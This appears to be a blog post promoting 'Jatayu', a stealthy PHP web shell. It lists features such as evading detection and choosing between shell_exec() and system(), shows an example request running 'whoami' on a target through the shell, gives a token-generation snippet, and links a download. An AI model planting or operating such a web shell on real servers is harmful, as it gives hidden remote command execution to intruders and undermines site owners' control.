Kali Linux

Jatayu : Stealthy Stand Alone PHP Web Shell

JATAYU a Stealthy Stand Alone PHP Web Shell .

FEATURES

  • Http Header Based Authentication.
  • 100% Undetectable.
  • Exec Function Changer.
  • Nothing Fancy

USAGE

GET /test/jatayu.php?fn=1&&cmd=whoami
Host : http://test.com
Authtoken : bb3b1a1f-0447-42a6-955a-88681fb88499

FUNCTIONS

PARAMETERFUNCTION
fn=1Calls function shell_exec()
fn=2Calls function system()
cmd=idExecutes command

GENERATE AUTHTOKEN

php
$r = unpack(‘v*’, fread(fopen(‘/dev/random’, ‘r’),16));
$apiKey = sprintf(‘%04x%04x-%04x-%04x-%04x-%04x%04x%04x’,
$r[1], $r[2], $r[3], $r[4] & 0x0fff | 0x4000,
$r[5] & 0x3fff | 0x8000, $r[6], $r[7], $r[8]);
echo $apiKey;
?>

Download
R K

Leave a Comment
Share
Published by
R K
Tags: JatayuPHP Web ShellStealthy
2 years ago

Recent Posts

M.E.A.T. – Pioneering Mobile Forensics With The Mobile Evidence Acquisition Toolkit

The Mobile Evidence Acquisition Toolkit designed by BlackStone Discovery. Developed to enhance digital forensics, this…

16 hours ago

Social Media OSINT Tools – A Comprehensive Guide

Here are some tools that you can use for Social Media OSINT. In the ever-evolving…

16 hours ago

Elenco Di Distro – Distribuzioni Windows, MacOS, Linux Per OSINT E Cybersecurity

Scoprite l'elenco completo delle distribuzioni di sistemi operativi per Windows, MacOS e Linux, specializzate in…

16 hours ago

Social Analyzer : A Cutting-Edge Tool For Social Media Investigations

Social Analyzer - API, CLI, and Web App for analyzing & finding a person's profile…

16 hours ago

cURL For OSINT – Unlocking The Power Of Command Line Tools For Intelligence Gathering

cURL is a command line tool created in 1998 by Daniel Stenberg, a Swedish Developper/Programmer.Daniel Stenberg's…

16 hours ago

BeVigil CLI – A Comprehensive Guide To OSINT API Integration

bevigil-cli provides a unified command line interface and python library for using BeVigil OSINT API. BeVigil…

2 days ago